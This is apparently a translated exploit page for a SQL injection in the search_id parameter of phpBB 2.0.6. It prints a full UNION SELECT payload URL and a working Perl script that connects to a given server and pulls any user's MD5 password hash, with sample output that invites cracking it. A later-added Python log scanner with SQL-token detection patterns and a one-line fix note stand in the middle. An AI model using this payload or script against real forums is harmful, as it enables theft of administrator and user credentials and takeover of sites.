Exploiting the search_id SQL Injection in phpBB v2.06


Description: we will now use this bug to pull out the MD5 password hash. The search_id parameter of search.php is put into the query without being cast to an integer, so a UNION SELECT can be appended to it:

/search.php?search_id=search_id%20union%20select%20concat(char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108,116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,109,97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,112,108,105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34),user_password,char(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54,58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,104,97,114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%20user_id=user_id/*

Here, search_id = the id of the user whose password hash you want.
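From the defender's side, the request shape above is easy to spot in web server access logs: a legitimate search_id is a number (or one of a few fixed keywords), so anything carrying SQL tokens is an attack attempt. The following is an added example, not part of the original page or the phpBB project; the log lines are constructed, and the keyword list is an assumption about which non-numeric search_id values phpBB 2 itself accepts.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines (not taken from any real server). The third line
# mirrors the shape of the search_id payload described on this page; the others are benign.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /phpBB/search.php?search_id=2 HTTP/1.0" 200 5120
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /phpBB/viewtopic.php?t=15 HTTP/1.0" 200 8120
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /phpBB/search.php?search_id=2%20union%20select%20concat(char(97,58,55),user_password,char(34))%20from%20phpbb_users%20where%20user_id=2/* HTTP/1.0" 200 4096
198.51.100.7 - - [10/Oct/2023:13:56:05 +0000] "GET /phpBB/search.php?search_id=newposts HTTP/1.0" 200 3000
"""

# Common Log Format: client ip, timestamp, request line, status.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Tokens that never belong in a numeric search_id; checked on the percent-decoded value.
SQL_TOKENS = re.compile(r'\b(union|select|concat|char)\b|/\*|\(|\)', re.IGNORECASE)

# Assumed set of non-numeric search_id values phpBB 2 handles itself.
KNOWN_KEYWORDS = {"newposts", "egosearch", "unanswered"}


def classify_search_id(value):
    """Return 'numeric', 'keyword', 'suspicious' or 'unknown' for one decoded search_id value."""
    if value.isdigit():
        return "numeric"
    if value in KNOWN_KEYWORDS:
        return "keyword"
    if SQL_TOKENS.search(value):
        return "suspicious"
    return "unknown"


def find_injection_attempts(log_text):
    """Scan access-log text and return (client ip, decoded search_id) for each suspicious search.php hit."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlparse(m.group("target"))
        if not url.path.endswith("/search.php"):
            continue
        # parse_qs percent-decodes the value, so the %20-separated SQL becomes readable.
        for value in parse_qs(url.query, keep_blank_values=True).get("search_id", []):
            if classify_search_id(value) == "suspicious":
                hits.append((m.group("ip"), value))
    return hits
```

The same check, applied to the parameter before it reaches the query (cast to int or reject), is the fix on the application side.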

We also have a ready-made script, written by the RusH security team, that retrieves the MD5 hash for any given id:

Usage:

security-com-vn.pl <server> <folder> <user_id> <search_id>

<server> - IP address or URL - e.g. www.security.com.vn

<folder> - Directory holding the forum - e.g. phpBB

<user_id> - Id of the user - e.g. 2, the default admin id in phpBB

<search_id> - 1, 2, 3, 4, whichever you like; it is just the value used to trigger the SQL injection ;)

* Only works with MySQL > 4.0
* Each run retrieves only one MD5 password hash


Example:
C:\security-com-vn.pl www.security.com.vn phpBB 2 2
[~] Chuan bi ket noi ...
[+] Da ket noi
[~] Chuan bi gui yeu cau ...
[+] OK
[~] Cho nhan du lieu...
[+] MD5 Hash cua user id=2 is: 5f4dcc3b5aa765d61d8327deb882cf99 <=== there's the MD5 hash; know what to do with it? :D

Code:
#!/usr/bin/perl -w
use IO::Socket;
if (@ARGV < 4)
{
print "\n\n";
print "|****************************************************************|\n";
print " security-com-vn.pl\n";
print " phpBB v<=2.06 search_id sql injection exploit (POC version)\n";
print " by VietNam security team // http://www.security.com.vn/ \n";
print " Usage: security-com-vn.pl <server> <folder> <user_id> <search_id>\n";
print " e.g.: security-com-vn.pl www.security.com.vn phpBB 2 2\n";
print " [~] <server> - Địa chỉ IP hoặc URL - vi dụ : http://www.security.com.vn/\n";
print " [~] <folder> - Thư mục chứa Forum - Ví dụ : phpBB\n";
print " [~] <user_id> - Id của user - Ví dụ : 2 mặc định của Admin trong phpBB\n";
print " [~] <search_id> - 1 ,2 ,3 ,4 tuỳ thế nào cũng được cái Value để gây ra SQL injection ấy mùn ;)\n";
print "|****************************************************************|\n";
print "\n\n";
exit(1);
}
$success = 0;
$server = $ARGV[0];
$folder = $ARGV[1];
$user_id = $ARGV[2];
$search_id = $ARGV[3];
print "[~] prepare to connect...\n";
# plain TCP connection to the web server on port 80
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "$socket error $!";
print "[+] connected\n";
print "[~] prepare to send data...\n";
# PROOF-OF-CONCEPT request: the same UNION SELECT payload as above, with the
# user_password column wrapped so it shows up in the search result link
print $socket "GET /$folder/search.php?search_id=$search_id%20union%20select%20concat(char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108,116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,109,97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,112,108,105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34),user_password,char(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54,58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,104,97,114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%20user_id=$user_id/* HTTP/1.0\r\n\r\n";
print "[+] OK\n";
print "[~] wait for response...\n";
# the hash is returned inside the "highlight=" part of the result link
while ($answer = <$socket>)
{
if ($answer =~ /;highlight=/)
{
$success = 1;
@result=split(/;/,$answer);
@result2=split(/=/,$result[1]);
$result2[1]=~s/&amp/ /g;
print "[+] MD5 Hash for user with id=$user_id is: $result2[1]\n";
}
}
if ($success==0) {print "[-] exploit failed =(\n";}